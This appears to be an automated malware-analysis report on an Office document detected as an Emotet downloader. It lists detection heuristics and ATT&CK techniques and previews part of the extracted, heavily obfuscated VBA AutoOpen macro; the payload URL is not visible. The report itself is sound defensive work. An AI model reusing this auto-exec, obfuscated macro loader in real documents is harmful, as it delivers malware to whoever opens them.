MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing obfuscated VBA macros, specifically an AutoOpen macro, which is a common loader for Emotet. Heuristics indicate an obfuscated auto-exec loader that uses GetObject and execution sinks, consistent with Emotet's behavior. The ClamAV signature also confirms detection as Emotet. The VBA script's primary function appears to be downloading and executing a second-stage payload, although the exact download URL is obfuscated within the script.
Heuristics 8
-
ClamAV: Doc.Downloader.Emotet-10001946-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-10001946-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9079 bytes |
SHA-256: 410ee80eb334a4c731b5d126b46c1f93aec566541f9acaa4ccdd74386890c17e |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "C41355"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "p479940, 0, 0, MSForms, TextBox"
Attribute VB_Control = "z_6296_6, 1, 1, MSForms, TextBox"
Attribute VB_Control = "Q_9934, 2, 2, MSForms, TextBox"
Attribute VB_Control = "L586445, 3, 3, MSForms, TextBox"
Attribute VB_Control = "U3162544, 4, 4, MSForms, TextBox"
Attribute VB_Control = "N6111574, 5, 5, MSForms, TextBox"
Attribute VB_Name = "h5_876_"
Attribute VB_Name = "u977642"
Function j50187(P396241)
While E637531_ _
And _
z6883220
d7794043 = "K222412"
N69_340 = "F0528546"
Q6_9606 = "833382143"
P2_2553 = "813939108"
V557283 = "n90388_"
Wend
While J939_0 _
And _
w0_93_
B2058870 = "s25_3_"
l44336 = "Z5_30_8"
p268634 = "849633288"
E81819_3 = "563013670"
z5543309 = "X2759573"
Wend
Set j50187 = CVar(P396241)
While r2_29995 _
And _
Y0972_
K20625 = "S76758"
z426_6 = "q55_38_"
G9404173 = "627235485"
s48957 = "614544410"
G3985881 = "i7173_24"
Wend
While W3312_1 _
And _
O2715932
X1811_ = "O887361"
j943232 = "A37058"
j6822265 = "749785511"
j_2_33 = "521213248"
z40711_ = "T4_66075"
Wend
While L4669418 _
And _
j70500
i61663 = "v8286705"
Z38000_ = "a33070"
A08934 = "822617055"
c_81869 = "273596095"
i98272_ = "l9701596"
Wend
End Function
Sub _
_
_
autoopen()
On Error Resume Next
While A73890 _
And _
P5285__3
d520432 = "B9941630"
h13672_ = "B0592457"
P17515 = "994401364"
C23289 = "671879029"
w79594 = "i1718_58"
Wend
While M96158 _
And _
C613_900
P35_7808 = "l90837_9"
V48732 = "C4268791"
K02808 = "168230370"
S1492495 = "22061743"
j6308683 = "t2_877"
Wend
While B68171 _
And _
d5262_7
X4244934 = "U188217"
z16_8819 = "v752375"
l9683804 = "919772961"
Y75908_5 = "426907968"
C3959_ = "F969016"
Wend
L8942331
While C896457_ _
And _
H82967
E33592_ = "D786_514"
z976334_ = "d31776"
i077_56 = "381557287"
J3158_3 = "867820558"
E3635450 = "v63770"
Wend
While E21_961 _
And _
U642445
w2665521 = "n6808944"
S1_3_45 = "L9791042"
k08014_9 = "595952756"
z1926_3 = "262428734"
z95533 = "C579618"
Wend
While k267_02 _
And _
Y9581585
a2671343 = "t94577"
v4995_0 = "j2_0_323"
c55772 = "975880155"
Z126__64 = "962471819"
Z8348213 = "I244036"
Wend
End Sub
Attribute VB_Name = "F197993_"
Function L8942331()
On Error Resume Next
While i36869 _
And _
l_039449
M38537 = "Q377510"
Q361_249 = "B419470"
h4___3 = "456836531"
G69597 = "964266366"
H32576 = "A363_626"
Wend
While D806384 _
And _
X2_92326
w408222 = "c603265"
j3850672 = "T67_356"
D842_0 = "425744602"
w038940 = "842110806"
a511794 = "d7076352"
Wend
b94_1494 = C41355.N6111574 + C41355.z_6296_6 + C41355.N6111574 + C41355.Q_9934 + C41355.N6111574 + C41355.N6111574 + C41355.L586445 + C41355.N6111574 + C41355.N6111574 + C41355.U3162544 + C41355.N6111574 + C41355.p479940 + C41355.N6111574
While X6919_3 _
And _
i52517
z560019 = "t590782"
A0232128 = "b_7069"
r776113 = "48777659"
O19_64 = "583332642"
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.